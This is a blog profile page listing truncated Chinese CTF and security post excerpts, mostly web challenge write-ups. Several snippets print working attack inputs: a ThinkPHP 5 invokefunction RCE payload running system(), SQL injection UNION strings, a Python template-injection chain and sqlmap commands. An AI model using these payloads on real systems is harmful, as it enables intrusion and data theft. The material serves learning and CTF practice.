- 博客(32)
- 收藏
- 关注
原创 [wp] HCTF 2018 warmup
好久好久没做题了(进去有个滑稽的图片,那就先看看源码,发现提示source.php,访问得知还有hint.php,得知flag在ffffllllaaaagggg然后看了看源码,第一反应是不是编码的的绕过,但是研究了下,好像和编码绕过没啥关系,就是个套娃,套就完事了,构造payload:/?file=source.php?file=ffffllllaaaagggg是一片空白但是总体的思路...
2020-02-09 00:35:26 1667 1
原创 记第一次正式线下~
这次线下可以说是我第一次正式的参加awd比赛,之前也并不是没有参加过,不过那一次比赛方的环境出了一些莫名的问题,我们的gamebox会莫名宕机,基本没有什么体验可言…相比之下这次上海之行,可以说是非常愉快的体验,也从hz前辈那边学到不少,这里表示非常的感谢.这篇文章主要对awd线下赛中web方向的流程做一个梳理,个人的一点浅显的经验,各位师傅请多多包涵.文章目录赛前准备配路由表比赛开始ssh连...
2019-12-02 10:35:03 1493
原创 [wp] bytectf boring_code &上海市大学生网络安全大赛 Decade
boring_code这里只截取部分进行讨论<?php $code=@$_POST['code'];if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) { if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|p...
2019-11-05 22:23:15 1923 3
原创 [wp] HECTF2019 让我们一起来变魔术吧
<?phpclass Read { public $var; public $token; public $token_flag; public function __construct() { $this->token_flag = $this->token = md5(rand(1,10000)); } pub...
2019-11-05 12:56:42 1342
原创 [信安数基] 二次剩余
膜重复平方计算+欧拉判别条件#include<iostream>#include<cmath>using namespace std;int square(int x) { return x * x; } int fastMod(int x, int n, int m){ if (n == 0) return 1; ...
2019-10-28 00:55:38 1236
原创 AS利用adb无线调试
adb安装去Android开发官方网站,下载到最新的Android platform-tools翻不了墙的同学可以下我这个链接,提取码:7kmg将adb.exe所在目录添加到环境变量,右键此电脑,选择属性,然后选择高级系统设置,接着点击环境变量双击Path后点击新建,粘贴adb.exe所在的目录.利用adb连接安卓手机第一次使用前要将手机用数据线与电脑连接打开as在下方输入ad...
2019-10-07 20:35:02 2178
原创 [wp] 攻防世界 CISCN-2018-Final blgdel
访问robots.txt,发现config.txt<?phpclass master{ private $path; private $name; function __construct() { } function stream_open($path) { if(!preg_match('/(.*)\/(.*)$/s',$path,$array,0...
2019-10-04 10:49:00 1905
原创 [sqli-labs]Less1~22答案
Less-1?id=1' order by 3#正常?id=1' order by 4#Unknown column '4' in 'order clause'?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+# information_sch...
2019-10-03 18:17:09 1090
原创 [wp] 攻防世界 Web_php_wrong_nginx_config
在robots.txt下发现hack.php,访问抓包修改cookie出现页面,抓包观察,发现在点击管理中心时url出现?file=index&ext=php尝试进行文件读取,发现…/被过滤,根据题目提示构造url获取conf文件,格式化后如下:在这里插入代码片server { listen 8080; ## listen for ipv4; this ...
2019-10-03 11:44:49 2968
原创 [wp] 攻防世界 ics-02
进去扫目录发现/secret无法直接进入secret_debug.php 显示ip不对点paper会向download.php传参,可以下载一个ssrf内容的pdf,于是想到利用ssrf来访问secret_debug.php发现参数s,fuzz一下,发现s=3时会有如下返回经测试在此页面发现sql注入漏洞,进行注入得到flag,脚本如下:import requestsimpor...
2019-09-29 21:22:25 2899
原创 [wp] 攻防世界 Web_python_template_injection
7*7变成49了,应该存在模板注入http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7Dhttp://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
2019-09-28 15:50:18 6651 5
原创 [wp] 攻防世界 Web_php_include
<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?>strstr是对大小写敏感的,用大写PHP绕过...
2019-09-28 00:11:24 6867
原创 ThinkPHP5.x rec 漏洞分析与复现
https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf先贴个漏洞预警,这里做一些内容摘要:漏洞描述由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。...
2019-09-27 00:34:33 7540 1
原创 [wp] 攻防世界 php_rce
根据提示,上网搜了下thinkphp5 rce漏洞,改一改payload就出了emmm?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27下次写个...
2019-09-25 19:28:31 7726 2
原创 [wp] 攻防世界 ics-04
尝试注册登陆账号扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1"sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
2019-09-24 11:18:46 32840 9
原创 [wp] 攻防世界 upload1
右键查看源码发现<script type="text/javascript"> Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] === obj) { return true;...
2019-09-23 22:35:13 2381
原创 [wp] 攻防世界 Web_php_unserialize
先是一段代码审计:<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight...
2019-09-22 16:54:14 37351 6
原创 [wp] Hack.lu 2017 FlatScience
进去就是页面跳来跳去emmm,先扫个目录好了:扫到一个login.php,查看源码,发现参数debug,传参?debug=1,得到如下代码:<?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['usr']; $pass = $_POST['pw'...
2019-09-17 22:38:35 1274
原创 [wp] HITB CTF 2017 website
拿到题目看了源代码后只发现了一个action.php线索仍然不足,于是开始扫目录,发现一个叫test.php的页面发现一串base64字符,然后对action.php页面进行抓包,修改username返回了admin的csrftokengetflag抓包修改,把username和token改了,直接得到了flag....
2019-09-16 23:39:43 984 3
原创 [wp] 攻防世界 isc-07
首先看源代码里的这一段:if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'config.php'; $id = mysql_real_escape_string($_GET[id]); ...
2019-09-16 12:39:33 979
原创 [wp] RCTF2019-nextphp
<?phpif (isset($_GET['a'])) { eval($_GET['a']);} else { show_source(__FILE__);}尝试利用eval?a=echo system("ls");system()函数被禁止了.尝试查看phpinfo();?a=phpinfo();查看成功,在页面查找disable_function...
2019-09-11 18:49:57 1822 1
原创 github+docker复现CTF-web题目
git clone + 网址 + 本地目录例如我要复现rctf的一道题目,首先我在github上找到这道题目点击Clone复制网址
2019-09-11 14:59:45 3726 4
原创 [wp] 攻防世界-i-got-id-200
点击Files,这里会把上传的文件的内容在下方输出,猜测后台逻辑:use strict;use warnings; use CGI;my $cgi= CGI->new;if ( $cgi->upload( 'file' ) ) { my $file= $cgi->param( 'file' ); while ( <$file> ) { print "...
2019-09-10 00:04:07 3409 7
原创 [wp] 攻防世界-wtf.sh-150
注册了个账号然后登陆,这个颜色真的看得眼睛疼…浏览了下留言感觉好像都是比较正常的,试试简单的xss显然不行2333在post参数fuzz了一下,发现有路径穿越:源代码中搜索发现:发现有名为users的文件夹,于是乎:明显这里储存的是用户的TOKEN,抓包修改:其中user参数很容易就得到了,这理解略过了,查看返回的代码,发现了flag提交发现flag不对,定睛一看这才半段f...
2019-09-07 15:49:32 3124 1
原创 [wp] 攻防世界-web2
进来就是代码审计:<?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o)...
2019-09-07 14:16:23 939
原创 [wp]攻防世界-bug
注册完账号登陆点击Manage:接下来想办法能不能把admin账号给他搞了:找回用户需要输入生日以及地址emmm,发现cookie里面有个参数user,看起来像md5,先尝试跑一下,不过原先的用户名可能太长了,user的值应该是和用户名有关的,这里我们重新注册了一个名为a的用户,尝试md5解密解密的结果是6:a,6是a的uid,于是得出user是uid:用户名的md5,之前我验证...
2019-09-07 13:57:02 1317
原创 meterpreter提权小结
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权首先我们可以输入getuid来查看当前用户的权限~可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限.getsystem自动提权输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限这个就比较玄学,我还没成功过,可以看到g...
2019-09-05 23:06:38 3073
原创 第二章代码以及部分测试样例
学习过程中敲的代码,save一下Recursive.javaimport java.util.Scanner;public class Recursive { static int tile; static int[][] board; public static void main(String[] args) { //二分搜索测试// int[] a = {...
2019-09-02 19:17:20 843 3
原创 递归算法--排列问题
全排列算法什么是全排列?我的理解是一个集合内元素的所所有排列的方式叫全排列,如下图:设R为元素集合,Ri = R - { ri },R的全排列记为perm( R ),(ri)perm(Ri)表示perm(Ri)加上前缀ri,得到全排列的递归定义:当n=1时,perm( R ) = ( r ),当n>1时,perm( R )由(r1)prem(R1),(r2)prem(R2),(r...
2019-08-30 22:01:04 1167 3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人